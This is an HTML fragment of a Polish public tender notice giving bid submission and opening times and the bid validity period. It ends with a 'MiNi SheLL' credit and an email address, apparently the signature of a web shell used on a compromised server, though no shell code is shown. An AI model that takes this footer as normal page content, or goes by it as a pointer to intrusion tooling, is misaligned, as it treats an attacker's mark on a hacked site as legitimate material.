mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-22 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-22 09:35</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com